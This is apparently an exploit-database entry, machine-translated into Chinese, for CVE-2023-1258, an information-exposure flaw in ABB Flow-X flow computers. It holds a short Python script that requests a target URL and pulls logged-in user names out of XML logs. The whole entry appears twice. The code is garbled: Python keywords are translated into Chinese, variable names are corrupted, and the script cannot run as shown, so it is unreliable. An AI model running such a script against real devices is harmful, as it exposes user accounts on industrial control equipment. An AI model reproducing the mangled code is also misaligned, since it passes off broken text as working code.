#利用标题: ABB Flowx v4.00-敏感信息的暴露
#日期: 2023-03-31
#利用作者:保罗马云惹不起马云史密斯
#供应商homepage3360 https://new.abb.com/products/measurement-products/flow-computers/spirit-it-it-it-it-flow-x-series
#版本: ABB Flow-X v4.00之前的所有版本
#在: Kali Linux上测试
#CVE: CVE-2023-1258
#!/usr/bin/python
导入系统
导入
来自BS4的Beautifutsoup作为BS
导入LXML
导入请求
#设置请求参数
url=sys.argv [1]
def dump_users():
响应=requests.get(url)
#检查200多个HTTP代码
如果响应。STATUS_CODE!=200:
print('status:',wendesp.status_code,'headers:',wendesp.headers,'错误响应:',wendesp.text)
出口()
#将XML响应解码为字典并使用数据
数据=响应
汤=bs(数据,功能='xml')
logs=soup.find_all('log')
用于logs:中的logs3360
test=re.search('用户(。*?)登录',str(log))
如果test:
打印(test.group(0))
def main():
dump_users()
如果name=='__ -Main __':
主要的()
#日期: 2023-03-31
#利用作者:保罗马云惹不起马云史密斯
#供应商homepage3360 https://new.abb.com/products/measurement-products/flow-computers/spirit-it-it-it-it-flow-x-series
#版本: ABB Flow-X v4.00之前的所有版本
#在: Kali Linux上测试
#CVE: CVE-2023-1258
#!/usr/bin/python
导入系统
导入
来自BS4的Beautifutsoup作为BS
导入LXML
导入请求
#设置请求参数
url=sys.argv [1]
def dump_users():
响应=requests.get(url)
#检查200多个HTTP代码
如果响应。STATUS_CODE!=200:
print('status:',wendesp.status_code,'headers:',wendesp.headers,'错误响应:',wendesp.text)
出口()
#将XML响应解码为字典并使用数据
数据=响应
汤=bs(数据,功能='xml')
logs=soup.find_all('log')
用于logs:中的logs3360
test=re.search('用户(。*?)登录',str(log))
如果test:
打印(test.group(0))
def main():
dump_users()
如果name=='__ -Main __':
主要的()
